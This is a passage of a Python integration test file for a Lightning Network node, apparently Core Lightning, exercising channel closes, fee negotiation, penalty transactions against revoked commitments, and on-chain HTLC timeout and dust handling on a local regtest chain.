wait_for(lambda: only_one(l1.rpc.listpeers(l2.info['id'])['peers'][0]['channels'])['status'] == [
'CLOSINGD_SIGEXCHANGE:We agreed on a closing fee of {} satoshi for tx:{}'.format(fee, closetxid),
'ONCHAIN:Tracking mutual close transaction',
'ONCHAIN:All outputs resolved: waiting 90 more blocks before forgetting channel'
])
# Make sure both have forgotten about it
bitcoind.generate_block(90)
wait_for(lambda: len(l1.rpc.listchannels()['channels']) == 0)
wait_for(lambda: len(l2.rpc.listchannels()['channels']) == 0)
# The entry in the channels table should still be there
assert l1.db_query("SELECT count(*) as c FROM channels;")[0]['c'] == 1
assert l2.db_query("SELECT count(*) as c FROM channels;")[0]['c'] == 1
def test_closing_while_disconnected(node_factory, bitcoind, executor):
l1, l2 = node_factory.line_graph(2, opts={'may_reconnect': True})
chan = l1.get_channel_scid(l2)
l1.pay(l2, 200000000)
l2.stop()
# The close should still be triggered afterwards.
fut = executor.submit(l1.rpc.close, chan, 0)
l1.daemon.wait_for_log(' to CHANNELD_SHUTTING_DOWN')
l2.start()
fut.result(TIMEOUT)
l1.daemon.wait_for_log(' to CLOSINGD_SIGEXCHANGE')
l2.daemon.wait_for_log(' to CLOSINGD_SIGEXCHANGE')
# And should put closing into mempool.
l1.daemon.wait_for_log('sendrawtx exit 0')
l2.daemon.wait_for_log('sendrawtx exit 0')
bitcoind.generate_block(101)
wait_for(lambda: len(l1.rpc.listchannels()['channels']) == 0)
wait_for(lambda: len(l2.rpc.listchannels()['channels']) == 0)
def test_closing_id(node_factory):
"""Test closing using peer ID and full channel ID
"""
l1, l2 = node_factory.get_nodes(2)
# Close by full channel ID.
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fund_channel(l2, 10**6)
cid = l2.rpc.listpeers()['peers'][0]['channels'][0]['channel_id']
l2.rpc.close(cid)
wait_for(lambda: not only_one(l1.rpc.listpeers(l2.info['id'])['peers'])['connected'])
wait_for(lambda: not only_one(l2.rpc.listpeers(l1.info['id'])['peers'])['connected'])
# Close by peer ID.
l2.rpc.connect(l1.info['id'], 'localhost', l1.port)
l1.daemon.wait_for_log("Handed peer, entering loop")
l2.fund_channel(l1, 10**6)
pid = l1.info['id']
l2.rpc.close(pid)
wait_for(lambda: not only_one(l1.rpc.listpeers(l2.info['id'])['peers'])['connected'])
wait_for(lambda: not only_one(l2.rpc.listpeers(l1.info['id'])['peers'])['connected'])
def test_closing_torture(node_factory, executor, bitcoind):
# We set up N-to-N fully-connected mesh, then try
# closing them all at once.
amount = 10**6
num_nodes = 10 # => 55 channels (36 seconds on my laptop)
if VALGRIND:
num_nodes -= 4 # => 21 (135 seconds)
if SLOW_MACHINE:
num_nodes -= 1 # => 45/15 (37/95 seconds)
nodes = node_factory.get_nodes(num_nodes)
# Make sure bitcoind has plenty of utxos
bitcoind.generate_block(num_nodes)
# Give them all plenty of UTXOs, make sure they see them
for i in range(len(nodes)):
for j in range(i + 1, len(nodes)):
addr = nodes[i].rpc.newaddr()['bech32']
bitcoind.rpc.sendtoaddress(addr, (amount + 1000000) / 10**8)
bitcoind.generate_block(1)
sync_blockheight(bitcoind, nodes)
txs = []
for i in range(len(nodes)):
for j in range(i + 1, len(nodes)):
nodes[i].rpc.connect(nodes[j].info['id'], 'localhost', nodes[j].port)
txs.append(nodes[i].rpc.fundchannel(nodes[j].info['id'], amount)['txid'])
# Make sure they're all in, then lock them in.
bitcoind.generate_block(1, wait_for_mempool=txs)
# Wait for them all to be CHANNELD_NORMAL
for n in nodes:
wait_for(lambda: all(p['channels'][0]['state'] == 'CHANNELD_NORMAL' for p in n.rpc.listpeers()['peers']))
# Start closers: can take a long time under valgrind!
futures = []
for i in range(len(nodes)):
for j in range(i + 1, len(nodes)):
futures.append(executor.submit(nodes[i].rpc.close, nodes[j].info['id']))
futures.append(executor.submit(nodes[j].rpc.close, nodes[i].info['id']))
# Wait for close to finish
close_txs = set()
for f in futures:
# If one side completes closing, we'll get an error here 'Peer has no active channel'
try:
close_txs.add(f.result(TIMEOUT)['txid'])
except RpcError as err:
assert err.error['message'] == 'Peer has no active channel'
# Should have one close for each open.
assert len(close_txs) == len(txs)
# Get closes confirmed
bitcoind.generate_block(100, wait_for_mempool=list(close_txs))
# And make sure they hangup.
for n in nodes:
wait_for(lambda: n.rpc.listpeers()['peers'] == [])
@unittest.skipIf(SLOW_MACHINE and VALGRIND, "slow test")
def test_closing_different_fees(node_factory, bitcoind, executor):
l1 = node_factory.get_node()
# Default feerate = 15000/7500/1000
# It will start at the second number, accepting anything above the first.
feerates = [[20000, 15000, 7400], [8000, 1001, 100]]
amounts = [0, 545999, 546000]
num_peers = len(feerates) * len(amounts)
addr = l1.rpc.newaddr()['bech32']
bitcoind.rpc.sendtoaddress(addr, 1)
numfunds = len(l1.rpc.listfunds()['outputs'])
bitcoind.generate_block(1)
wait_for(lambda: len(l1.rpc.listfunds()['outputs']) > numfunds)
# Create them in a batch, for speed!
peers = []
for feerate in feerates:
for amount in amounts:
p = node_factory.get_node(feerates=feerate)
p.feerate = feerate
p.amount = amount
l1.rpc.connect(p.info['id'], 'localhost', p.port)
peers.append(p)
for p in peers:
p.channel = l1.rpc.fundchannel(p.info['id'], 10**6, minconf=0)['channel_id']
# Technically, this is async to fundchannel returning.
l1.daemon.wait_for_log('sendrawtx exit 0')
bitcoind.generate_block(6)
# Now wait for them all to hit normal state, do payments
l1.daemon.wait_for_logs(['update for channel .* now ACTIVE'] * num_peers
+ ['to CHANNELD_NORMAL'] * num_peers)
for p in peers:
if p.amount != 0:
l1.pay(p, 100000000)
# Now close all channels (not unilaterally!)
closes = [executor.submit(l1.rpc.close, p.channel, 0) for p in peers]
for c in closes:
c.result(90)
# close does *not* wait for the sendrawtransaction, so do that!
# Note that since they disagree on the ideal fee, they may conflict
# (first one in will win), so we cannot look at logs, we need to
# wait for mempool.
wait_for(lambda: bitcoind.rpc.getmempoolinfo()['size'] == num_peers)
bitcoind.generate_block(1)
for p in peers:
p.daemon.wait_for_log(' to ONCHAIN')
wait_for(lambda: 'ONCHAIN:Tracking mutual close transaction' in only_one(p.rpc.listpeers(l1.info['id'])['peers'][0]['channels'])['status'])
l1.daemon.wait_for_logs([' to ONCHAIN'] * num_peers)
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_closing_negotiation_reconnect(node_factory, bitcoind):
disconnects = ['-WIRE_CLOSING_SIGNED',
'@WIRE_CLOSING_SIGNED',
'+WIRE_CLOSING_SIGNED']
l1 = node_factory.get_node(disconnect=disconnects, may_reconnect=True)
l2 = node_factory.get_node(may_reconnect=True)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
chan = l1.fund_channel(l2, 10**6)
l1.pay(l2, 200000000)
assert bitcoind.rpc.getmempoolinfo()['size'] == 0
l1.rpc.close(chan)
l1.daemon.wait_for_log(' to CHANNELD_SHUTTING_DOWN')
l2.daemon.wait_for_log(' to CHANNELD_SHUTTING_DOWN')
l1.daemon.wait_for_log(' to CLOSINGD_SIGEXCHANGE')
l2.daemon.wait_for_log(' to CLOSINGD_SIGEXCHANGE')
# And should put closing into mempool (happens async, so
# CLOSINGD_COMPLETE may come first).
l1.daemon.wait_for_logs(['sendrawtx exit 0', ' to CLOSINGD_COMPLETE'])
l2.daemon.wait_for_logs(['sendrawtx exit 0', ' to CLOSINGD_COMPLETE'])
assert bitcoind.rpc.getmempoolinfo()['size'] == 1
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_penalty_inhtlc(node_factory, bitcoind, executor, chainparams):
"""Test penalty transaction with an incoming HTLC"""
# We suppress each one after first commit; HTLC gets added not fulfilled.
# Feerates identical so we don't get gratuitous commit to update them
l1 = node_factory.get_node(disconnect=['=WIRE_COMMITMENT_SIGNED-nocommit'], may_fail=True, feerates=(7500, 7500, 7500), allow_broken_log=True)
l2 = node_factory.get_node(disconnect=['=WIRE_COMMITMENT_SIGNED-nocommit'])
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fund_channel(l2, 10**6)
# Now, this will get stuck due to l1 commit being disabled..
t = executor.submit(l1.pay, l2, 100000000)
assert len(l1.getactivechannels()) == 2
assert len(l2.getactivechannels()) == 2
# They should both have commitments blocked now.
l1.daemon.wait_for_log('=WIRE_COMMITMENT_SIGNED-nocommit')
l2.daemon.wait_for_log('=WIRE_COMMITMENT_SIGNED-nocommit')
# Make sure l1 got l2's commitment to the HTLC, and sent to master.
l1.daemon.wait_for_log('got commitsig')
# Take our snapshot.
tx = l1.rpc.dev_sign_last_tx(l2.info['id'])['tx']
# Let them continue
l1.rpc.dev_reenable_commit(l2.info['id'])
l2.rpc.dev_reenable_commit(l1.info['id'])
# Should fulfill.
l1.daemon.wait_for_log('peer_in WIRE_UPDATE_FULFILL_HTLC')
l1.daemon.wait_for_log('peer_out WIRE_REVOKE_AND_ACK')
l2.daemon.wait_for_log('peer_out WIRE_UPDATE_FULFILL_HTLC')
l1.daemon.wait_for_log('peer_in WIRE_REVOKE_AND_ACK')
# Payment should now complete.
t.result(timeout=10)
# Now we really mess things up!
bitcoind.rpc.sendrawtransaction(tx)
bitcoind.generate_block(1)
l2.daemon.wait_for_log(' to ONCHAIN')
# FIXME: l1 should try to stumble along!
wait_for(lambda: len(l2.getactivechannels()) == 0)
# l2 should spend all of the outputs (except to-us).
# Could happen in any order, depending on commitment tx.
needle = l2.daemon.logsearch_start
l2.wait_for_onchaind_broadcast('OUR_PENALTY_TX',
'THEIR_REVOKED_UNILATERAL/DELAYED_OUTPUT_TO_THEM')
l2.daemon.logsearch_start = needle
l2.wait_for_onchaind_broadcast('OUR_PENALTY_TX',
'THEIR_REVOKED_UNILATERAL/THEIR_HTLC')
# FIXME: test HTLC tx race!
# 100 blocks later, all resolved.
bitcoind.generate_block(100)
l2.daemon.wait_for_log('onchaind complete, forgetting peer')
outputs = l2.rpc.listfunds()['outputs']
assert [o['status'] for o in outputs] == ['confirmed'] * 2
# Allow some lossage for fees.
slack = 27000 if chainparams['elements'] else 15000
assert sum(o['value'] for o in outputs) < 10**6
assert sum(o['value'] for o in outputs) > 10**6 - slack
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_penalty_outhtlc(node_factory, bitcoind, executor, chainparams):
"""Test penalty transaction with an outgoing HTLC"""
# First we need to get funds to l2, so suppress after second.
# Feerates identical so we don't get gratuitous commit to update them
l1 = node_factory.get_node(disconnect=['=WIRE_COMMITMENT_SIGNED*3-nocommit'], may_fail=True, feerates=(7500, 7500, 7500), allow_broken_log=True)
l2 = node_factory.get_node(disconnect=['=WIRE_COMMITMENT_SIGNED*3-nocommit'])
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fund_channel(l2, 10**6)
# Move some across to l2.
l1.pay(l2, 200000000)
assert not l1.daemon.is_in_log('=WIRE_COMMITMENT_SIGNED')
assert not l2.daemon.is_in_log('=WIRE_COMMITMENT_SIGNED')
# Now, this will get stuck due to l1 commit being disabled..
t = executor.submit(l2.pay, l1, 100000000)
# Make sure we get signature from them.
l1.daemon.wait_for_log('peer_in WIRE_UPDATE_ADD_HTLC')
l1.daemon.wait_for_log('peer_in WIRE_COMMITMENT_SIGNED')
# They should both have commitments blocked now.
l1.daemon.wait_for_log('dev_disconnect: =WIRE_COMMITMENT_SIGNED')
l2.daemon.wait_for_log('dev_disconnect: =WIRE_COMMITMENT_SIGNED')
# Make sure both sides got revoke_and_ack for that commitment.
l1.daemon.wait_for_log('peer_in WIRE_REVOKE_AND_ACK')
l2.daemon.wait_for_log('peer_in WIRE_REVOKE_AND_ACK')
# Take our snapshot.
tx = l1.rpc.dev_sign_last_tx(l2.info['id'])['tx']
# Let them continue
l1.rpc.dev_reenable_commit(l2.info['id'])
l2.rpc.dev_reenable_commit(l1.info['id'])
# Thread should complete.
t.result(timeout=10)
# Make sure both sides got revoke_and_ack for final.
l1.daemon.wait_for_log('peer_in WIRE_REVOKE_AND_ACK')
l2.daemon.wait_for_log('peer_in WIRE_REVOKE_AND_ACK')
# Now we really mess things up!
bitcoind.rpc.sendrawtransaction(tx)
bitcoind.generate_block(1)
l2.daemon.wait_for_log(' to ONCHAIN')
# FIXME: l1 should try to stumble along!
# l2 should spend all of the outputs (except to-us).
# Could happen in any order, depending on commitment tx.
needle = l2.daemon.logsearch_start
l2.wait_for_onchaind_broadcast('OUR_PENALTY_TX',
'THEIR_REVOKED_UNILATERAL/DELAYED_OUTPUT_TO_THEM')
l2.daemon.logsearch_start = needle
l2.wait_for_onchaind_broadcast('OUR_PENALTY_TX',
'THEIR_REVOKED_UNILATERAL/OUR_HTLC')
l2.daemon.logsearch_start = needle
l2.daemon.wait_for_log('Ignoring output.*: THEIR_REVOKED_UNILATERAL/OUTPUT_TO_US')
# FIXME: test HTLC tx race!
# 100 blocks later, all resolved.
bitcoind.generate_block(100)
wait_for(lambda: len(l2.rpc.listpeers()['peers']) == 0)
outputs = l2.rpc.listfunds()['outputs']
assert [o['status'] for o in outputs] == ['confirmed'] * 3
# Allow some lossage for fees.
slack = 27000 if chainparams['elements'] else 15000
assert sum(o['value'] for o in outputs) < 10**6
assert sum(o['value'] for o in outputs) > 10**6 - slack
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_onchain_first_commit(node_factory, bitcoind):
"""Onchain handling where funder immediately drops to chain"""
# HTLC 1->2, 1 fails just after funding.
disconnects = ['+WIRE_FUNDING_LOCKED', 'permfail']
l1 = node_factory.get_node(disconnect=disconnects)
# Make locktime different, as we once had them reversed!
l2 = node_factory.get_node(options={'watchtime-blocks': 10})
l1.fundwallet(10**7)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.rpc.fundchannel(l2.info['id'], 10**6)
l1.daemon.wait_for_log('sendrawtx exit 0')
l1.bitcoin.generate_block(1)
# l1 will drop to chain.
l1.daemon.wait_for_log('permfail')
l1.daemon.wait_for_log('sendrawtx exit 0')
l1.bitcoin.generate_block(1)
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
# 10 later, l1 should collect its to-self payment.
bitcoind.generate_block(10)
l1.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
# 94 later, l2 is done.
bitcoind.generate_block(94)
l2.daemon.wait_for_log('onchaind complete, forgetting peer')
# Now, 100 blocks and l1 should be done.
bitcoind.generate_block(6)
l1.daemon.wait_for_log('onchaind complete, forgetting peer')
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_onchain_unwatch(node_factory, bitcoind):
"""Onchaind should not watch random spends"""
l1, l2 = node_factory.line_graph(2)
l1.pay(l2, 200000000)
l1.rpc.dev_fail(l2.info['id'])
l1.daemon.wait_for_log('Failing due to dev-fail command')
l1.wait_for_channel_onchain(l2.info['id'])
l1.bitcoin.generate_block(1)
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
# 10 later, l1 should collect its to-self payment.
bitcoind.generate_block(10)
l1.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
# First time it sees it, onchaind cares.
bitcoind.generate_block(1)
l1.daemon.wait_for_log('Resolved OUR_UNILATERAL/DELAYED_OUTPUT_TO_US by our proposal '
'OUR_DELAYED_RETURN_TO_WALLET')
# Now test unrelated onchain churn.
# Daemon gets told about wallet; says it doesn't care.
l1.rpc.withdraw(l1.rpc.newaddr()['bech32'], 'all')
bitcoind.generate_block(1)
l1.daemon.wait_for_log("but we don't care")
# And lightningd should respect that!
assert not l1.daemon.is_in_log("Can't unwatch txid")
# So these should not generate further messages
for i in range(5):
l1.rpc.withdraw(l1.rpc.newaddr()['bech32'], 'all')
bitcoind.generate_block(1)
# Make sure it digests the block
sync_blockheight(bitcoind, [l1])
# We won't see this again.
assert not l1.daemon.is_in_log("but we don't care",
start=l1.daemon.logsearch_start)
# Note: for this test we leave onchaind running, so we can detect
# any leaks!
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_onchaind_replay(node_factory, bitcoind):
disconnects = ['+WIRE_REVOKE_AND_ACK', 'permfail']
options = {'watchtime-blocks': 201, 'cltv-delta': 101}
# Feerates identical so we don't get gratuitous commit to update them
l1 = node_factory.get_node(options=options, disconnect=disconnects, feerates=(7500, 7500, 7500))
l2 = node_factory.get_node(options=options)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fund_channel(l2, 10**6)
rhash = l2.rpc.invoice(10**8, 'onchaind_replay', 'desc')['payment_hash']
routestep = {
'msatoshi': 10**8 - 1,
'id': l2.info['id'],
'delay': 101,
'channel': '1x1x1'
}
l1.rpc.sendpay([routestep], rhash)
l1.daemon.wait_for_log('sendrawtx exit 0')
bitcoind.generate_block(1)
# Wait for nodes to notice the failure, this seach needle is after the
# DB commit so we're sure the tx entries in onchaindtxs have been added
l1.daemon.wait_for_log("Deleting channel .* due to the funding outpoint being spent")
l2.daemon.wait_for_log("Deleting channel .* due to the funding outpoint being spent")
# We should at least have the init tx now
assert len(l1.db_query("SELECT * FROM channeltxs;")) > 0
assert len(l2.db_query("SELECT * FROM channeltxs;")) > 0
# Generate some blocks so we restart the onchaind from DB (we rescan
# last_height - 100)
bitcoind.generate_block(100)
sync_blockheight(bitcoind, [l1, l2])
# l1 should still have a running onchaind
assert len(l1.db_query("SELECT * FROM channeltxs;")) > 0
l2.rpc.stop()
l1.restart()
# Can't wait for it, it's after the "Server started" wait in restart()
assert l1.daemon.is_in_log(r'Restarting onchaind for channel')
# l1 should still notice that the funding was spent and that we should react to it
l1.daemon.wait_for_log("Propose handling OUR_UNILATERAL/DELAYED_OUTPUT_TO_US by OUR_DELAYED_RETURN_TO_WALLET")
sync_blockheight(bitcoind, [l1])
bitcoind.generate_block(10)
sync_blockheight(bitcoind, [l1])
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_onchain_dust_out(node_factory, bitcoind, executor):
"""Onchain handling of outgoing dust htlcs (they should fail)"""
# HTLC 1->2, 1 fails after it's irrevocably committed
disconnects = ['@WIRE_REVOKE_AND_ACK', 'permfail']
# Feerates identical so we don't get gratuitous commit to update them
l1 = node_factory.get_node(disconnect=disconnects, feerates=(7500, 7500, 7500))
l2 = node_factory.get_node()
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fund_channel(l2, 10**6)
# Must be dust!
rhash = l2.rpc.invoice(1, 'onchain_dust_out', 'desc')['payment_hash']
routestep = {
'msatoshi': 1,
'id': l2.info['id'],
'delay': 5,
'channel': '1x1x1'
}
l1.rpc.sendpay([routestep], rhash)
payfuture = executor.submit(l1.rpc.waitsendpay, rhash)
# l1 will drop to chain.
l1.daemon.wait_for_log('permfail')
l1.wait_for_channel_onchain(l2.info['id'])
l1.bitcoin.generate_block(1)
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
# We use 3 blocks for "reasonable depth"
bitcoind.generate_block(3)
# It should fail.
with pytest.raises(RpcError, match=r'WIRE_PERMANENT_CHANNEL_FAILURE: missing in commitment tx'):
payfuture.result(5)
# Retry payment, this should fail (and, as a side-effect, tickle a
# bug).
with pytest.raises(RpcError, match=r'WIRE_UNKNOWN_NEXT_PEER'):
l1.rpc.sendpay([routestep], rhash)
# 6 later, l1 should collect its to-self payment.
bitcoind.generate_block(6)
l1.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
# 94 later, l2 is done.
bitcoind.generate_block(94)
l2.daemon.wait_for_log('onchaind complete, forgetting peer')
# Restart l1, it should not crash!
l1.restart()
# Now, 100 blocks and l1 should be done.
bitcoind.generate_block(6)
l1.daemon.wait_for_log('onchaind complete, forgetting peer')
# Payment failed, BTW
assert only_one(l2.rpc.listinvoices('onchain_dust_out')['invoices'])['status'] == 'unpaid'
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_onchain_timeout(node_factory, bitcoind, executor):
"""Onchain handling of outgoing failed htlcs"""
# HTLC 1->2, 1 fails just after it's irrevocably committed
disconnects = ['+WIRE_REVOKE_AND_ACK*3', 'permfail']
# Feerates identical so we don't get gratuitous commit to update them
l1 = node_factory.get_node(disconnect=disconnects, feerates=(7500, 7500, 7500))
l2 = node_factory.get_node()
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fund_channel(l2, 10**6)
rhash = l2.rpc.invoice(10**8, 'onchain_timeout', 'desc')['payment_hash']
# We underpay, so it fails.
routestep = {
'msatoshi': 10**8 - 1,
'id': l2.info['id'],
'delay': 5,
'channel': '1x1x1'
}
l1.rpc.sendpay([routestep], rhash)
with pytest.raises(RpcError):
l1.rpc.waitsendpay(rhash)
# Make sure CLTVs are different, in case it confuses onchaind.
bitcoind.generate_block(1)
sync_blockheight(bitcoind, [l1])
# Second one will cause drop to chain.
l1.rpc.sendpay([routestep], rhash)
payfuture = executor.submit(l1.rpc.waitsendpay, rhash)
# l1 will drop to chain.
l1.daemon.wait_for_log('permfail')
l1.wait_for_channel_onchain(l2.info['id'])
l1.bitcoin.generate_block(1)
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
# Wait for timeout.
l1.daemon.wait_for_logs(['Propose handling OUR_UNILATERAL/DELAYED_OUTPUT_TO_US by OUR_DELAYED_RETURN_TO_WALLET .* after 5 blocks',
'Propose handling OUR_UNILATERAL/OUR_HTLC by OUR_HTLC_TIMEOUT_TX .* after 6 blocks'])
bitcoind.generate_block(4)
l1.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
bitcoind.generate_block(1)
l1.wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TX',
'OUR_UNILATERAL/OUR_HTLC')
# We use 3 blocks for "reasonable depth"
bitcoind.generate_block(3)
# It should fail.
with pytest.raises(RpcError, match=r'WIRE_PERMANENT_CHANNEL_FAILURE: timed out'):
payfuture.result(5)
# 2 later, l1 spends HTLC (5 blocks total).
bitcoind.generate_block(2)
l1.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_HTLC_TIMEOUT_TX/DELAYED_OUTPUT_TO_US')
# 89 later, l2 is done.
bitcoind.generate_block(89)
l2.daemon.wait_for_log('onchaind complete, forgetting peer')
# Now, 100 blocks and l1 should be done.
bitcoind.generate_block(10)
sync_blockheight(bitcoind, [l1])
assert not l1.daemon.is_in_log('onchaind complete, forgetting peer')
bitcoind.generate_block(1)
l1.daemon.wait_for_log('onchaind complete, forgetting peer')
# Payment failed, BTW
assert only_one(l2.rpc.listinvoices('onchain_timeout')['invoices'])['status'] == 'unpaid'
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_onchain_middleman(node_factory, bitcoind):
# HTLC 1->2->3, 1->2 goes down after 2 gets preimage from 3.
disconnects = ['-WIRE_UPDATE_FULFILL_HTLC', 'permfail']
l1 = node_factory.get_node()
l2 = node_factory.get_node(disconnect=disconnects)
l3 = node_factory.get_node()
# l2 connects to both, so l1 can't reconnect and thus l2 drops to chain
l2.rpc.connect(l1.info['id'], 'localhost', l1.port)
l2.rpc.connect(l3.info['id'], 'localhost', l3.port)
l2.fund_channel(l1, 10**6)
c23 = l2.fund_channel(l3, 10**6)
# Make sure routes finalized.
bitcoind.generate_block(5)
l1.wait_channel_active(c23)
# Give l1 some money to play with.
l2.pay(l1, 2 * 10**8)
# Must be bigger than dust!
rhash = l3.rpc.invoice(10**8, 'middleman', 'desc')['payment_hash']
route = l1.rpc.getroute(l3.info['id'], 10**8, 1)["route"]
assert len(route) == 2
q = queue.Queue()
def try_pay():
try:
l1.rpc.sendpay(route, rhash)
l1.rpc.waitsendpay(rhash)
q.put(None)
except Exception as err:
q.put(err)
t = threading.Thread(target=try_pay)
t.daemon = True
t.start()
# l2 will drop to chain.
l2.daemon.wait_for_log('sendrawtx exit 0')
l1.bitcoin.generate_block(1)
l2.daemon.wait_for_log(' to ONCHAIN')
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log('OUR_UNILATERAL/THEIR_HTLC')
# l2 should fulfill HTLC onchain, and spend to-us (any order)
l2.wait_for_onchaind_broadcast('OUR_HTLC_SUCCESS_TX',
'OUR_UNILATERAL/THEIR_HTLC')
# Payment should succeed.
l1.bitcoin.generate_block(1)
l1.daemon.wait_for_log('THEIR_UNILATERAL/OUR_HTLC gave us preimage')
err = q.get(timeout=10)
if err:
print("Got err from sendpay thread")
raise err
t.join(timeout=1)
assert not t.is_alive()
# Three more, l2 can spend to-us.
bitcoind.generate_block(3)
l2.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
# One more block, HTLC tx is now spendable.
l1.bitcoin.generate_block(1)
l2.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_HTLC_SUCCESS_TX/DELAYED_OUTPUT_TO_US')
# 100 blocks after last spend, l2 should be done.
l1.bitcoin.generate_block(100)
l2.daemon.wait_for_log('onchaind complete, forgetting peer')
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_onchain_feechange(node_factory, bitcoind, executor):
"""Onchain handling when we restart with different fees"""
# HTLC 1->2, 2 fails just after they're both irrevocably committed
# We need 2 to drop to chain, because then 1's HTLC timeout tx
# is generated on-the-fly, and is thus feerate sensitive.
disconnects = ['-WIRE_UPDATE_FAIL_HTLC', 'permfail']
l1 = node_factory.get_node(may_reconnect=True)
l2 = node_factory.get_node(disconnect=disconnects,
may_reconnect=True)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fund_channel(l2, 10**6)
rhash = l2.rpc.invoice(10**8, 'onchain_timeout', 'desc')['payment_hash']
# We underpay, so it fails.
routestep = {
'msatoshi': 10**8 - 1,
'id': l2.info['id'],
'delay': 5,
'channel': '1x1x1'
}
executor.submit(l1.rpc.sendpay, [routestep], rhash)
# l2 will drop to chain.
l2.daemon.wait_for_log('permfail')
l2.wait_for_channel_onchain(l1.info['id'])
bitcoind.generate_block(1)
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
# Wait for timeout.
l1.daemon.wait_for_log('Propose handling THEIR_UNILATERAL/OUR_HTLC by OUR_HTLC_TIMEOUT_TO_US .* after 6 blocks')
bitcoind.generate_block(6)
l1.wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
'THEIR_UNILATERAL/OUR_HTLC')
# Make sure that gets included.
bitcoind.generate_block(1)
# Now we restart with different feerates.
l1.stop()
l1.daemon.cmd_line.append('--override-fee-rates=20000/9000/2000')
l1.start()
# We recognize different proposal as ours.
l1.daemon.wait_for_log('Resolved THEIR_UNILATERAL/OUR_HTLC by our proposal OUR_HTLC_TIMEOUT_TO_US')
# We use 3 blocks for "reasonable depth", so add two more
bitcoind.generate_block(2)
# Note that the very similar test_onchain_timeout looks for a
# different string: that's because it sees the JSONRPC response,
# and due to the l1 restart, there is none here.
l1.daemon.wait_for_log('WIRE_PERMANENT_CHANNEL_FAILURE')
# 90 later, l2 is done
bitcoind.generate_block(89)
sync_blockheight(bitcoind, [l2])
assert not l2.daemon.is_in_log('onchaind complete, forgetting peer')
bitcoind.generate_block(1)
l2.daemon.wait_for_log('onchaind complete, forgetting peer')
# Now, 7 blocks and l1 should be done.
bitcoind.generate_block(6)
sync_blockheight(bitcoind, [l1])
assert not l1.daemon.is_in_log('onchaind complete, forgetting peer')
bitcoind.generate_block(1)
l1.daemon.wait_for_log('onchaind complete, forgetting peer')
# Payment failed, BTW
assert only_one(l2.rpc.listinvoices('onchain_timeout')['invoices'])['status'] == 'unpaid'
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1 for dev-set-fees")
def test_onchain_all_dust(node_factory, bitcoind, executor):
"""Onchain handling when we reduce output to all dust"""
# HTLC 1->2, 2 fails just after they're both irrevocably committed
# We need 2 to drop to chain, because then 1's HTLC timeout tx
# is generated on-the-fly, and is thus feerate sensitive.
disconnects = ['-WIRE_UPDATE_FAIL_HTLC', 'permfail']
# Feerates identical so we don't get gratuitous commit to update them
l1 = node_factory.get_node(options={'dev-no-reconnect': None}, feerates=(7500, 7500, 7500))
l2 = node_factory.get_node(disconnect=disconnects)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fund_channel(l2, 10**6)
rhash = l2.rpc.invoice(10**8, 'onchain_timeout', 'desc')['payment_hash']
# We underpay, so it fails.
routestep = {
'msatoshi': 10**7 - 1,
'id': l2.info['id'],
'delay': 5,
'channel': '1x1x1'
}
executor.submit(l1.rpc.sendpay, [routestep], rhash)
# l2 will drop to chain.
l2.daemon.wait_for_log('permfail')
l2.wait_for_channel_onchain(l1.info['id'])
# Make l1's fees really high (and wait for it to exceed 50000)
l1.set_feerates((100000, 100000, 100000))
l1.daemon.wait_for_log('Feerate estimate for normal set to [56789][0-9]{4}')
bitcoind.generate_block(1)
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
# Wait for timeout.
l1.daemon.wait_for_log('Propose handling THEIR_UNILATERAL/OUR_HTLC by IGNORING_TINY_PAYMENT .* after 6 blocks')
bitcoind.generate_block(5)
l1.wait_for_onchaind_broadcast('IGNORING_TINY_PAYMENT',
'THEIR_UNILATERAL/OUR_HTLC')
l1.daemon.wait_for_log('Ignoring output 0 of .*: THEIR_UNILATERAL/OUR_HTLC')
